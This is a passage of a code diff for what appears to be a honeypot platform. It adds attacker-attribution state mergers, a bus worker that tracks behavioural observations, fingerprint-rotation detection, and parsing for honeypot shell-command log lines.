    state: str
    confidence: float
    observation_count: int
    last_observation_ts: float
 def aggregate_observations(
    observations: Sequence[dict[str, Any]],
    *,
    value_kind: str | None = None,
 ) -> AttributionState:
    """Run the merger over *observations* and return derived state.
    *observations* is a list of dicts with at minimum ``value``,
    ``ts``, ``confidence`` (matching
    ``ObservationRow.observations_time_series`` output). Sessions
    are derived from the ``ts`` axis — the merger does not need a
    separate session id; cross-session alternation is detected by
    the gap distribution. Sessions are NOT collapsed before the
    merger; ``multi_actor`` reasons over the full per-observation
    series.
    *value_kind* is a hint from the BEHAVE primitive registry — Phase
    2 only honours ``"categorical"`` (or ``None``, treated as
    categorical). Phase 3 will dispatch on ``"numeric"`` /
    ``"hash"`` to the matching merger.
    """
    if not observations:
        return _unknown(0.0, count=0)
    if value_kind in (None, "categorical"):
        return aggregate_categorical(observations)
    if value_kind == "numeric":
        return aggregate_numeric(observations)
    if value_kind == "hash":
        return aggregate_hash(observations)
    raise ValueError(
        f"aggregate_observations: unknown value_kind={value_kind!r}; "
        "expected 'categorical' | 'numeric' | 'hash' | None",
    )
 def aggregate_numeric(
    observations: Sequence[dict[str, Any]],
 ) -> AttributionState:
    """Numeric merger — for primitives whose ``value`` is an int /
    float (e.g. ``toolchain.c2.beacon_interval_ms``,
    ``motor.paste_burst_rate``).
    Compares the EWMA of the recent window against the EWMA of the
    older window; reports dispersion as coefficient of variation.
    * < ``MIN_OBSERVATIONS_FOR_STATE`` → ``unknown``
    * recent CV < ``NUMERIC_STABLE_DISPERSION_PCT`` *and* mean shift
      from older window < ``NUMERIC_DRIFT_MEAN_SHIFT_PCT`` → ``stable``
    * mean shifted >= ``NUMERIC_DRIFT_MEAN_SHIFT_PCT`` → ``drifting``
    * recent CV > ``NUMERIC_CONFLICT_DISPERSION_PCT`` → ``conflicted``
    * otherwise → ``stable`` (falling-through case for moderate
      dispersion that hasn't yet become drift)
    Confidence on stable/drifting is ``1 - min(CV, 1.0)`` —
    tighter dispersion = higher confidence. Conflicted is ``0.5``
    by convention; we cannot meaningfully claim certainty in a
    statistic computed over a degenerate sample.
    ``current_value`` is the recent EWMA, not the last raw
    observation: numeric primitives are noisy by nature and
    surfacing the smoothed estimate keeps the dashboard from
    flapping on every tick. ``multi_actor`` is *not* a numeric state
    in v0 — bimodal distributions belong to the categorical
    detector once the primitive's value space is bucketed.
    """
    n = len(observations)
    last_ts = float(observations[-1].get("ts", 0.0)) if observations else 0.0
    if n < _T.MIN_OBSERVATIONS_FOR_STATE:
        return AttributionState(
            current_value=_safe_float(observations[-1].get("value")) if n else None,
            state="unknown",
            confidence=0.0,
            observation_count=n,
            last_observation_ts=last_ts,
        )
    window = _T.CATEGORICAL_WINDOW_N
    recent_vals = [_safe_float(o.get("value")) for o in observations[-window:]]
    older_vals = [
        _safe_float(o.get("value"))
        for o in observations[-2 * window: -window]
    ]
    recent_mean = _ewma(recent_vals, _T.NUMERIC_EWMA_ALPHA)
    recent_cv = _coef_of_variation(recent_vals, recent_mean)
    if recent_cv > _T.NUMERIC_CONFLICT_DISPERSION_PCT:
        return AttributionState(
            current_value=recent_mean,
            state="conflicted",
            confidence=0.5,
            observation_count=n,
            last_observation_ts=last_ts,
        )
    if older_vals:
        older_mean = _ewma(older_vals, _T.NUMERIC_EWMA_ALPHA)
        denom = abs(older_mean) if older_mean != 0 else 1.0
        mean_shift = abs(recent_mean - older_mean) / denom
        if mean_shift >= _T.NUMERIC_DRIFT_MEAN_SHIFT_PCT:
            return AttributionState(
                current_value=recent_mean,
                state="drifting",
                confidence=max(0.0, 1.0 - min(recent_cv, 1.0)),
                observation_count=n,
                last_observation_ts=last_ts,
            )
    return AttributionState(
        current_value=recent_mean,
        state="stable",
        confidence=max(0.0, 1.0 - min(recent_cv, 1.0)),
        observation_count=n,
        last_observation_ts=last_ts,
    )
 def aggregate_hash(
    observations: Sequence[dict[str, Any]],
 ) -> AttributionState:
    """Hash merger — for rotation-resistant fingerprints
    (``toolchain.tls.jarm_server``, ``toolchain.ssh.hassh_client``).
    The merger does NOT recompute hashes; DEBT-032
    (``decnet.correlation.fingerprint_rotation``) already produces
    one observation per rotation event. The state machine counts
    distinct hash values inside ``HASH_DRIFT_WINDOW_SECS`` of the
    most recent observation:
    * 0 rotations (single hash, any count) → ``stable``
    * 1 to ``HASH_DRIFT_MAX`` rotations within window → ``drifting``
    * > ``HASH_DRIFT_MAX`` rotations within window → ``conflicted``
    ``unknown`` fires only on empty input — a single hash with one
    observation is enough signal to say "stable", because hashes
    don't have a noisy baseline the way categorical/numeric
    primitives do.
    ``current_value`` is the most recent hash. Confidence is
    ``1 / (1 + rotations_in_window)`` — one rotation halves
    confidence, two thirds it, etc.
    """
    n = len(observations)
    if n == 0:
        return _unknown(0.0, count=0)
    last_ts = float(observations[-1].get("ts", 0.0))
    last_value = observations[-1].get("value")
    window_start = last_ts - _T.HASH_DRIFT_WINDOW_SECS
    in_window = [
        o for o in observations
        if float(o.get("ts", 0.0)) >= window_start
    ]
    distinct = len({o.get("value") for o in in_window if o.get("value") is not None})
    rotations = max(0, distinct - 1)
    confidence = 1.0 / (1.0 + rotations)
    if rotations == 0:
        state = "stable"
    elif rotations <= _T.HASH_DRIFT_MAX:
        state = "drifting"
    else:
        state = "conflicted"
    return AttributionState(
        current_value=last_value,
        state=state,
        confidence=confidence,
        observation_count=n,
        last_observation_ts=last_ts,
    )
 def _ewma(values: Sequence[float], alpha: float) -> float:
    """Single-pass EWMA. Empty input is illegal; callers gate on
    ``MIN_OBSERVATIONS_FOR_STATE`` upstream."""
    it = iter(values)
    smoothed = next(it)
    for v in it:
        smoothed = alpha * v + (1.0 - alpha) * smoothed
    return smoothed
 def _coef_of_variation(values: Sequence[float], mean: float) -> float:
    """Population-style CV = stdev / |mean|. Returns 0 on a constant
    signal; returns +inf-equivalent (1e9) when the mean is exactly
    zero and the signal isn't constant — so the conflicted threshold
    fires without us having to special-case it upstream."""
    if not values:
        return 0.0
    diffs_sq = [(v - mean) ** 2 for v in values]
    variance = sum(diffs_sq) / len(values)
    stdev = variance ** 0.5
    if mean == 0:
        return 0.0 if stdev == 0 else 1e9
    return stdev / abs(mean)
 def _safe_float(value: Any) -> float:
    """Defensive coercion — observations may carry value=None on
    unknown-emitter primitives. Treat None as 0.0; the dispersion
    check will surface the resulting flat baseline as 'stable'
    which is the honest answer for a single-observation primitive
    that hasn't fired yet."""
    if value is None:
        return 0.0
    if isinstance(value, bool):
        return 1.0 if value else 0.0
    return float(value)
 def aggregate_categorical(
    observations: Sequence[dict[str, Any]],
 ) -> AttributionState:
    """Categorical merger — the dominant case for BEHAVE-SHELL.
    Compares the recent N-window against the older N-window. With
    ``CATEGORICAL_WINDOW_N = 5`` and ``CATEGORICAL_MAJORITY_THRESHOLD
    = 4``:
    * fewer than ``MIN_OBSERVATIONS_FOR_STATE`` → ``unknown``
    * recent window has a clear majority + matches older window → ``stable``
    * recent window has a clear majority + differs from older window → ``drifting``
    * recent window split + alternation pattern across observations → ``multi_actor``
    * recent window split + no alternation → ``conflicted``
    Confidence is the recent-window agreement ratio; ``multi_actor``
    is capped at ``MULTI_ACTOR_MAX_CONFIDENCE``. The merger returns
    the most-recent observation's value as ``current_value``
    regardless of state — the dashboard wants a value to render
    even on ``conflicted`` rows.
    """
    n = len(observations)
    last_ts = float(observations[-1].get("ts", 0.0))
    last_value = observations[-1].get("value")
    if n < _T.MIN_OBSERVATIONS_FOR_STATE:
        return AttributionState(
            current_value=last_value,
            state="unknown",
            confidence=0.0,
            observation_count=n,
            last_observation_ts=last_ts,
        )
    window = _T.CATEGORICAL_WINDOW_N
    recent = observations[-window:]
    recent_values = [o.get("value") for o in recent]
    recent_count = Counter(recent_values)
    top_value, top_count = recent_count.most_common(1)[0]
    recent_size = len(recent)
    confidence = top_count / recent_size
    is_recent_clear = top_count >= min(
        _T.CATEGORICAL_MAJORITY_THRESHOLD, recent_size,
    )
    if not is_recent_clear:
        # Split recent window. Distinguish multi_actor (alternation)
        # from random conflict.
        if _is_alternation(observations):
            return AttributionState(
                current_value=last_value,
                state="multi_actor",
                confidence=min(confidence, _T.MULTI_ACTOR_MAX_CONFIDENCE),
                observation_count=n,
                last_observation_ts=last_ts,
            )
        return AttributionState(
            current_value=last_value,
            state="conflicted",
            confidence=confidence,
            observation_count=n,
            last_observation_ts=last_ts,
        )
    # Recent window has a clear majority. Compare to the prior
    # window to decide stable vs drifting.
    older = observations[-2 * window: -window]
    if not older:
        # Only one window's worth of data — call it stable. The
        # dashboard already gates "unknown" on
        # MIN_OBSERVATIONS_FOR_STATE so this branch is reachable
        # only when the operator has produced enough observations
        # for one full window but not two.
        return AttributionState(
            current_value=top_value,
            state="stable",
            confidence=confidence,
            observation_count=n,
            last_observation_ts=last_ts,
        )
    older_values = [o.get("value") for o in older]
    older_count = Counter(older_values)
    older_top_value, older_top_count = older_count.most_common(1)[0]
    older_size = len(older)
    older_clear = older_top_count >= min(
        _T.CATEGORICAL_MAJORITY_THRESHOLD, older_size,
    )
    if not older_clear:
        # Older window was itself conflicted; we just stabilised.
        # That's drift in the colloquial sense — the attacker
        # converged onto a single behaviour.
        return AttributionState(
            current_value=top_value,
            state="drifting",
            confidence=confidence,
            observation_count=n,
            last_observation_ts=last_ts,
        )
    if older_top_value != top_value:
        return AttributionState(
            current_value=top_value,
            state="drifting",
            confidence=confidence,
            observation_count=n,
            last_observation_ts=last_ts,
        )
    return AttributionState(
        current_value=top_value,
        state="stable",
        confidence=confidence,
        observation_count=n,
        last_observation_ts=last_ts,
    )
 def _is_alternation(observations: Sequence[dict[str, Any]]) -> bool:
    """Heuristic: do recent observations alternate between two values
    (operator A → B → A → B), as opposed to random thrashing?
    Conservative: requires at least 4 observations in the window,
    exactly 2 distinct values, and that flips outnumber repeats by
    at least 2:1. ATTRIBUTION-ENGINE.md §"Open question 1" warns
    that flapping primitives on flaky networks look like two
    operators; this guard is what keeps the false-positive rate down.
    """
    window = _T.CATEGORICAL_WINDOW_N
    recent = observations[-window:]
    if len(recent) < 4:
        return False
    values = [o.get("value") for o in recent]
    distinct = set(values)
    if len(distinct) != 2:
        return False
    flips = sum(
        1 for i in range(1, len(values)) if values[i] != values[i - 1]
    )
    repeats = (len(values) - 1) - flips
    return flips >= 2 * max(repeats, 1)
 def _unknown(last_ts: float, *, count: int) -> AttributionState:
    return AttributionState(
        current_value=None,
        state="unknown",
        confidence=0.0,
        observation_count=count,
        last_observation_ts=last_ts,
    )
--- a/decnet/correlation/attribution_worker.py
+++ b/decnet/correlation/attribution_worker.py
@@ -0,0 +1,394 @@
 """Attribution-engine bus subscriber — v0 Phase 1 skeleton.
 Subscribes to ``attacker.observation.>`` and, for each event, ensures
 the source attacker has a stub identity in ``attacker_identities``.
 Phase 1 does **not** invoke the merger or write
 ``attribution_state`` rows; that wiring lands in Phase 4 once the
 Phase 2/3 mergers are in.
 Pattern mirrors :mod:`decnet.correlation.reuse_worker`: bus-subscribe
 with a wake event, fall back to poll-only if the bus is unavailable,
 publish derived events with :func:`publish_safely`, log per-handler
 exceptions and continue.
 Trigger isolation: the per-event handler is wrapped in a single
 try/except. Any exception is logged and the loop continues with the
 next event. This is the same posture BEHAVE-SHELL's
 ``_handler.handle_session_ended`` adopts.
 """
 from __future__ import annotations
 import asyncio
 import contextlib
 from typing import Any
 from decnet.bus import topics as _topics
 from decnet.bus.base import BaseBus
 from decnet.bus.factory import get_bus
 from decnet.bus.publish import (
    publish_safely,
    run_control_listener_signal as _run_control_listener_signal,
    run_health_heartbeat as _run_health_heartbeat,
 )
 from decnet.correlation.attribution import _thresholds as _T
 from decnet.correlation.attribution.aggregate import aggregate_observations
 from decnet.logging import get_logger
 from decnet.web.db.repository import BaseRepository
 try:
    from behave_shell.spec import (
        PRIMITIVE_REGISTRY,
        ValueKind,
    )
    _BEHAVE_REGISTRY_AVAILABLE = True
 except ImportError:  # pragma: no cover
    PRIMITIVE_REGISTRY = {}
    ValueKind = None
    _BEHAVE_REGISTRY_AVAILABLE = False
 log = get_logger("correlation.attribution_worker")
 _WORKER_NAME = "attribution"
 _OBSERVATION_PATTERN = f"{_topics.ATTACKER}.{_topics.ATTACKER_OBSERVATION_PREFIX}.>"
 async def run_attribution_loop(
    repo: BaseRepository,
    *,
    shutdown: asyncio.Event | None = None,
    multi_actor_tick_secs: float | None = None,
 ) -> None:
    """Run the attribution worker until cancelled.
    Three concurrent tasks under one supervisor:
    1. ``_consume_observations`` — bus subscription on
       ``attacker.observation.>``; per-event handler upserts state.
    2. ``_multi_actor_tick`` — periodic walk of ``attribution_state``
       firing ``attribution.profile.multi_actor_suspected`` when an
       identity carries ≥ ``MULTI_ACTOR_MIN_PRIMITIVES`` rows in
       ``multi_actor`` state. Phase 5.
    3. Health + control standard channels.
    *shutdown* is an optional external stop signal.
    *multi_actor_tick_secs* overrides ``_thresholds.MULTI_ACTOR_TICK_SECS``
    (tests use this to drive the correlator without sleeping for a
    minute).
    """
    log.info("attribution worker started pattern=%s", _OBSERVATION_PATTERN)
    bus: BaseBus | None = None
    sub_task: asyncio.Task | None = None
    tick_task: asyncio.Task | None = None
    heartbeat_task: asyncio.Task | None = None
    control_task: asyncio.Task | None = None
    tick_secs = (
        multi_actor_tick_secs
        if multi_actor_tick_secs is not None
        else _T.MULTI_ACTOR_TICK_SECS
    )
    try:
        candidate = get_bus(client_name=f"{_WORKER_NAME}-correlator")
        await candidate.connect()
        bus = candidate
        sub_task = asyncio.create_task(
            _consume_observations(bus, repo),
        )
        tick_task = asyncio.create_task(
            _multi_actor_tick_loop(bus, repo, tick_secs),
        )
        heartbeat_task = asyncio.create_task(
            _run_health_heartbeat(bus, _WORKER_NAME),
        )
        control_task = asyncio.create_task(
            _run_control_listener_signal(bus, _WORKER_NAME),
        )
    except Exception as exc:  # noqa: BLE001
        log.warning(
            "attribution worker: bus unavailable, idle until bus returns: %s",
            exc,
        )
    if shutdown is None:
        shutdown = asyncio.Event()
    try:
        await shutdown.wait()
    except (asyncio.CancelledError, KeyboardInterrupt):
        log.info("attribution worker stopped")
    finally:
        for task in (sub_task, tick_task, heartbeat_task, control_task):
            if task is None:
                continue
            task.cancel()
            with contextlib.suppress(asyncio.CancelledError, Exception):
                await task
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
 async def _consume_observations(
    bus: BaseBus, repo: BaseRepository,
 ) -> None:
    """Pull events off ``attacker.observation.>`` and dispatch each
    to :func:`handle_observation_event`.
    Per-event exceptions are caught and logged; the subscription
    survives bad payloads. If the subscription itself dies (bus
    disconnect), the worker idles — the supervisor systemd unit
    will restart on a clean exit.
    """
    try:
        sub = bus.subscribe(_OBSERVATION_PATTERN)
        async with sub:
            async for event in sub:
                try:
                    await handle_observation_event(bus, repo, event)
                except Exception:  # noqa: BLE001
                    log.exception("attribution worker: handler failed")
    except asyncio.CancelledError:
        raise
    except Exception as exc:  # noqa: BLE001
        log.warning(
            "attribution worker: subscriber for %s died (%s)",
            _OBSERVATION_PATTERN, exc,
        )
 async def handle_observation_event(
    bus: BaseBus | None,
    repo: BaseRepository,
    event: Any,
 ) -> None:
    """Handle one ``attacker.observation.<primitive>`` event.
    Phase 1: ensure the source attacker has a stub identity, then log
    and return. Phase 4 will: load prior state, run merger, upsert
    new state, emit ``attribution.profile.state_changed`` on
    transition.
    *event* is whatever shape :class:`BaseBus`'s subscription yields —
    a ``BusEvent`` with ``payload`` (dict) and ``event_type`` (str)
    fields. The payload carries the BEHAVE envelope plus DECNET-side
    ``attacker_uuid`` denorm (see
    ``decnet.profiler.behave_shell._handler._publish_observation``).
    """
    payload = _payload_of(event)
    attacker_uuid = payload.get("attacker_uuid")
    primitive = payload.get("primitive")
    if not attacker_uuid or not primitive:
        log.debug(
            "attribution worker: skipping malformed event (uuid=%r primitive=%r)",
            attacker_uuid, primitive,
        )
        return
    identity_uuid = await repo.ensure_stub_identity_for_attacker(
        str(attacker_uuid),
    )
    if identity_uuid is None:
        log.info(
            "attribution worker: no Attacker row for uuid=%s yet; deferring",
            attacker_uuid,
        )
        return
    primitive_str = str(primitive)
    # Load the full per-(identity, primitive) observation series.
    # v0 with 1:1 stub identities, this is the single attacker's
    # series; v1's clusterer makes it a cross-attacker union.
    observations = await repo.observations_for_identity_primitive(
        identity_uuid, primitive_str,
    )
    if not observations:
        log.debug(
            "attribution worker: no observations yet for identity=%s "
            "primitive=%s (race with upsert)",
            identity_uuid, primitive_str,
        )
        return
    # Run merger.
    value_kind = _value_kind_for(primitive_str)
    new_state = aggregate_observations(observations, value_kind=value_kind)
    # Load prior state to detect transitions.
    prior = await repo.get_attribution_state(identity_uuid, primitive_str)
    state_changed = prior is None or prior.get("state") != new_state.state
    # Persist. last_change_ts is locked to the prior row when state is
    # unchanged so the dashboard's "stable since" timestamp doesn't
    # reset on every observation.
    if prior is not None and not state_changed:
        last_change_ts = float(prior.get("last_change_ts", new_state.last_observation_ts))
    else:
        last_change_ts = new_state.last_observation_ts
    await repo.upsert_attribution_state({
        "identity_uuid": identity_uuid,
        "primitive": primitive_str,
        "current_value": new_state.current_value,
        "state": new_state.state,
        "confidence": new_state.confidence,
        "observation_count": new_state.observation_count,
        "last_change_ts": last_change_ts,
        "last_observation_ts": new_state.last_observation_ts,
    })
    # Emit state_changed only on transition. Idempotent re-runs (same
    # observations, same merger output) produce no event — matches
    # the loop-prevention invariant that ttp.tagged uses.
    if state_changed and bus is not None:
        await publish_safely(
            bus,
            _topics.attribution(_topics.ATTRIBUTION_PROFILE_STATE_CHANGED),
            {
                "identity_uuid": identity_uuid,
                "primitive": primitive_str,
                "old_state": prior.get("state") if prior else None,
                "new_state": new_state.state,
                "current_value": new_state.current_value,
                "confidence": new_state.confidence,
                "observation_count": new_state.observation_count,
                "ts": new_state.last_observation_ts,
            },
            event_type=_topics.ATTRIBUTION_PROFILE_STATE_CHANGED,
        )
        log.info(
            "attribution worker: identity=%s primitive=%s %s -> %s confidence=%.2f",
            identity_uuid, primitive_str,
            (prior or {}).get("state") or "<new>", new_state.state,
            new_state.confidence,
        )
 def _value_kind_for(primitive: str) -> str:
    """Resolve a BEHAVE primitive name to the merger's ValueKind tag.
    Maps the BEHAVE registry's ``ValueKind`` enum onto the three
    mergers the engine ships:
    * ``CATEGORICAL`` / ``BOOL`` / ``FREE_STRING`` / ``ARRAY`` →
      ``"categorical"`` (BOOL is a 2-cardinality categorical;
      FREE_STRING and ARRAY collapse to opaque-token categorical
      until a v1 specialised merger lands)
    * ``NUMERIC`` → ``"numeric"``
    * ``HASH``    → ``"hash"``
    Unknown primitives (registry miss) default to categorical — the
    safest fallback because the categorical merger is one-outlier-
    tolerant and won't lie about confidence on noisy categorical
    data the way a numeric merger would on non-numeric values.
    """
    if not _BEHAVE_REGISTRY_AVAILABLE:
        return "categorical"
    spec = PRIMITIVE_REGISTRY.get(primitive)
    if spec is None or ValueKind is None:
        return "categorical"
    if spec.kind is ValueKind.NUMERIC:
        return "numeric"
    if spec.kind is ValueKind.HASH:
        return "hash"
    return "categorical"
 def _payload_of(event: Any) -> dict[str, Any]:
    """Extract the dict payload from a BusEvent or fall through if
    *event* is already a dict (test fixtures may pass either)."""
    payload = getattr(event, "payload", event)
    return payload if isinstance(payload, dict) else {}
 async def _multi_actor_tick_loop(
    bus: BaseBus, repo: BaseRepository, interval_secs: float,
 ) -> None:
    """Walk ``attribution_state`` every *interval_secs* and emit
    ``attribution.profile.multi_actor_suspected`` for any identity
    whose multi_actor primitives changed since the last tick.
    Dedupe: in-memory ``last_fired`` map keyed on identity_uuid →
    frozenset(primitives). Same primitive set as last fire → no
    re-emit. New primitive joining the set → re-emit. Set shrinks
    below ``MULTI_ACTOR_MIN_PRIMITIVES`` → drop the entry so it
    re-arms.
    In-memory dedup is honest for v0 — restart-resets are
    acceptable because the underlying ``attribution_state`` rows
    persist; on first tick after restart we re-emit the current
    set. v1 may persist a ``multi_actor_suspect_log`` table.
    """
    last_fired: dict[str, frozenset[str]] = {}
    try:
        while True:
            try:
                await tick_multi_actor(bus, repo, last_fired)
            except Exception:  # noqa: BLE001
                log.exception("attribution worker: multi_actor tick failed")
            await asyncio.sleep(interval_secs)
    except asyncio.CancelledError:
        raise
 async def tick_multi_actor(
    bus: BaseBus | None,
    repo: BaseRepository,
    last_fired: dict[str, frozenset[str]],
 ) -> int:
    """One pass of the cross-primitive correlator. Public for tests.
    Returns the number of ``multi_actor_suspected`` events emitted.
    """
    candidates = await repo.list_multi_actor_identities()
    fired = 0
    seen_now: set[str] = set()
    for entry in candidates:
        identity_uuid = str(entry["identity_uuid"])
        primitives: list[str] = sorted(entry.get("primitives") or [])
        seen_now.add(identity_uuid)
        if len(primitives) < _T.MULTI_ACTOR_MIN_PRIMITIVES:
            # Repo already filters to >= 2 today; defensive against
            # future schema drift.
            continue
        signature = frozenset(primitives)
        if last_fired.get(identity_uuid) == signature:
            continue
        last_fired[identity_uuid] = signature
        if bus is None:
            continue
        await publish_safely(
            bus,
            _topics.attribution(_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED),
            {
                "identity_uuid": identity_uuid,
                "primitives": primitives,
                "evidence_summary": (
                    f"{len(primitives)} primitives flagged multi_actor"
                ),
                "confidence": _T.MULTI_ACTOR_MAX_CONFIDENCE,
                "ts": _now(),
            },
            event_type=_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED,
        )
        fired += 1
        log.info(
            "attribution worker: multi_actor_suspected identity=%s primitives=%s",
            identity_uuid, primitives,
        )
    # Rearm: any identity that was in last_fired but no longer in
    # candidates dropped below the threshold; remove so the next
    # qualifying flap re-fires.
    for stale in [k for k in last_fired if k not in seen_now]:
        del last_fired[stale]
    return fired
 def _now() -> float:
    """Wall-clock seconds. Wrapped so tests can monkeypatch."""
    import time
    return time.time()
 __all__ = [
    "run_attribution_loop",
    "handle_observation_event",
    "tick_multi_actor",
 ]
--- a/decnet/correlation/fingerprint_rotation.py
+++ b/decnet/correlation/fingerprint_rotation.py
@@ -0,0 +1,153 @@
 """Attacker substrate-fingerprint rotation detection.
 Called inline from the prober at each fingerprint emit site.  Looks up
 the last persisted hash for ``(attacker_uuid, port, probe_type)``;
 when the new hash differs from the last one, emits a derived
 ``attacker.fingerprint_rotated`` event (bus + RFC 5424 syslog) and
 stamps the ``Attacker`` row's rotation telemetry.
 This is a pure library — no daemon, no async loop.  The prober is the
 only producer.  We just teach it to derive a second event on hash
 flip without standing up another worker (DEBT-032).
 """
 from __future__ import annotations
 import uuid as _uuid
 from dataclasses import dataclass
 from datetime import datetime
 from typing import Any, Callable, Literal
 from sqlmodel import Session, select
 from decnet.web.db.models import Attacker, AttackerFingerprintState
 ProbeType = Literal["jarm", "hassh", "tcpfp"]
 RotationKind = Literal[
    "no_attacker_row",  # caller raced ahead of correlator; skip silently
    "first_sighting",   # state row created, no prior hash
    "unchanged",        # same hash as last sighting
    "rotated",          # hash differs; event emitted, Attacker stamped
 ]
 PublishFn = Callable[[str, dict[str, Any]], None]
 SyslogFn = Callable[[str, dict[str, Any]], None]
@dataclass
 class RotationOutcome:
    """Return shape of :func:`record_fingerprint`.  Caller usually
    ignores it; useful for tests + tracing."""
    kind: RotationKind
    old_hash: str | None
    new_hash: str
    rotation_count: int
 _ROTATED_EVENT_TYPE = "attacker.fingerprint_rotated"
 def record_fingerprint(
    session: Session,
    *,
    attacker_ip: str,
    port: int,
    probe_type: ProbeType,
    new_hash: str,
    ts: datetime,
    publish_fn: PublishFn | None = None,
    syslog_fn: SyslogFn | None = None,
 ) -> RotationOutcome:
    """Upsert state row; on hash diff, emit derived event + stamp.
    Resolves ``attacker_uuid`` from ``attacker_ip`` via the existing
    Attacker table.  If no Attacker row exists yet (the prober raced
    ahead of the correlator), returns ``kind="no_attacker_row"`` and
    does nothing — the next probe cycle will pick it up once the
    correlator has caught up.
    State upsert + Attacker stamp + publish + syslog are committed in
    one transaction so a partial failure can't desync state from
    what was emitted.
    """
    attacker = session.exec(
        select(Attacker).where(Attacker.ip == attacker_ip)
    ).first()
    if attacker is None:
        return RotationOutcome(
            kind="no_attacker_row",
            old_hash=None,
            new_hash=new_hash,
            rotation_count=0,
        )
    row = session.exec(
        select(AttackerFingerprintState).where(
            AttackerFingerprintState.attacker_uuid == attacker.uuid,
            AttackerFingerprintState.port == port,
            AttackerFingerprintState.probe_type == probe_type,
        )
    ).first()
    if row is None:
        session.add(AttackerFingerprintState(
            uuid=str(_uuid.uuid4()),
            attacker_uuid=attacker.uuid,
            port=port,
            probe_type=probe_type,
            last_hash=new_hash,
            last_seen=ts,
            rotation_count=0,
        ))
        session.commit()
        return RotationOutcome(
            kind="first_sighting",
            old_hash=None,
            new_hash=new_hash,
            rotation_count=0,
        )
    if row.last_hash == new_hash:
        row.last_seen = ts
        session.add(row)
        session.commit()
        return RotationOutcome(
            kind="unchanged",
            old_hash=row.last_hash,
            new_hash=new_hash,
            rotation_count=row.rotation_count,
        )
    old_hash = row.last_hash
    row.last_hash = new_hash
    row.last_seen = ts
    row.rotation_count += 1
    session.add(row)
    attacker.rotation_count += 1
    attacker.last_rotation_at = ts
    session.add(attacker)
    payload: dict[str, Any] = {
        "attacker_uuid": attacker.uuid,
        "attacker_ip": attacker_ip,
        "port": port,
        "probe_type": probe_type,
        "old_hash": old_hash,
        "new_hash": new_hash,
        "rotation_count": row.rotation_count,
        "ts": ts.isoformat(),
    }
    if publish_fn is not None:
        publish_fn(_ROTATED_EVENT_TYPE, payload)
    if syslog_fn is not None:
        syslog_fn(_ROTATED_EVENT_TYPE, payload)
    session.commit()
    return RotationOutcome(
        kind="rotated",
        old_hash=old_hash,
        new_hash=new_hash,
        rotation_count=row.rotation_count,
    )
--- a/decnet/correlation/parser.py
+++ b/decnet/correlation/parser.py
@@ -32,6 +32,21 @@ _RFC5424_RE = re.compile(
    r"(.+)$",       # 5: SD element + optional MSG
 )
 # Honeypot SSH PROMPT_COMMAND lines arrive double-wrapped: the
 # Docker-stdout collector envelope wraps the inner ``logger
 # --rfc5424 --msgid command -t bash …`` line. Outer MSGID is NIL,
 # real MSGID lives in the body. Mirrors the unwrap logic in
 # ``decnet.collector.worker._INNER_RFC5424_RE`` — the two parsers
 # read the same on-wire format.
 _INNER_RFC5424_RE = re.compile(
    r"^(\d{4}-\d{2}-\d{2}T\S+)\s+"  # 1: inner TIMESTAMP
    r"(\S+)\s+"                       # 2: inner HOSTNAME
    r"(\S+)\s+"                       # 3: inner APP-NAME
    r"\S+\s+"                         # PROCID (NIL or PID)
    r"(\S+)\s+"                       # 4: inner MSGID
    r"(.+)$",                         # 5: inner SD/MSG remainder
 )
 # Structured data block: [relay@55555 k="v" ...]
 _SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
@@ -121,6 +136,21 @@ def parse_line(line: str) -> LogEvent | None:
    ts_raw, decky, service, event_type, sd_rest = m.groups()
    # Unwrap double-wrapped Docker-stdout envelopes around bash
    # PROMPT_COMMAND lines. See ``_INNER_RFC5424_RE`` and the matching
    # logic in ``decnet.collector.worker.parse_rfc5424``. Must run
    # before the decky/service NIL-guard below — the OUTER decky is
    # the docker host, the inner header carries the real source.
    if event_type == "-" and sd_rest.startswith("-"):
        body = sd_rest[1:].lstrip()
        inner = _INNER_RFC5424_RE.match(body)
        if inner is not None:
            _i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
            decky = i_host
            service = i_app
            event_type = i_msgid
            sd_rest = i_rest
    if decky == "-" or service == "-":
        return None
@@ -137,6 +167,19 @@ def parse_line(line: str) -> LogEvent | None:
        msg = tail.group(1).strip() if tail else ""
    attacker_ip = _extract_attacker_ip(fields, msg)
    # Free-form bash PROMPT_COMMAND lines arrive with MSGID=NIL or MSGID=command
    # and a body like `CMD uid=0 user=root src=… pwd=… cmd=<rest of line>`.
    # Without this rewrite they're invisible to the behavioral profiler, which
    # filters on event_type ∈ {command, exec, query, …}. The Dockerfile logger
    # invocation uses --msgid command, so we must also handle the non-nil case.
    if event_type in ("-", "command") and msg.startswith("CMD ") and "command" not in fields:
        event_type = "command"
        head, sep, cmd_rest = msg[4:].partition("cmd=")
        for k, v in re.findall(r'(\w+)=(\S+)', head):
            fields.setdefault(k, v)
        if sep:
            fields.setdefault("command", cmd_rest)
    # Mutator-emitted transitions arrive on the same ingest stream but
    # belong in the substrate-state index, not the per-IP attacker one.
    kind: EventKind = (
--- a/decnet/correlation/reuse_worker.py
+++ b/decnet/correlation/reuse_worker.py
@@ -70,7 +70,7 @@ async def run_reuse_loop(
        wake_tasks.append(asyncio.create_task(
            _run_control_listener_signal(bus, "reuse-correlator"),
        ))
-    except Exception as exc:  # noqa: BLE001
+    except Exception as exc:
        log.warning(
            "reuse correlator: bus unavailable, running in poll-only mode: %s",
            exc,
@@ -86,7 +86,7 @@ async def run_reuse_loop(
                results = await engine.correlate_credential_reuse(
                    repo, min_targets=min_targets,
                )
-            except Exception:  # noqa: BLE001
+            except Exception:
                log.exception("reuse correlator: tick failed")
                results = []
@@ -120,11 +120,11 @@ async def run_reuse_loop(
            t.cancel()
        if heartbeat_task is not None:
            heartbeat_task.cancel()
-        for t in (*wake_tasks, heartbeat_task):
+        for task in (*wake_tasks, heartbeat_task):
-            if t is None:
+            if task is None:
                continue
            with contextlib.suppress(asyncio.CancelledError, Exception):
-                await t
+                await task
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
@@ -143,7 +143,7 @@ async def _wake_on(bus: BaseBus, wake: asyncio.Event, pattern: str) -> None:
                wake.set()
    except asyncio.CancelledError:
        raise
-    except Exception as exc:  # noqa: BLE001
+    except Exception as exc:
        log.warning(
            "reuse correlator: subscriber for %s died (%s); falling back to poll",
            pattern, exc,
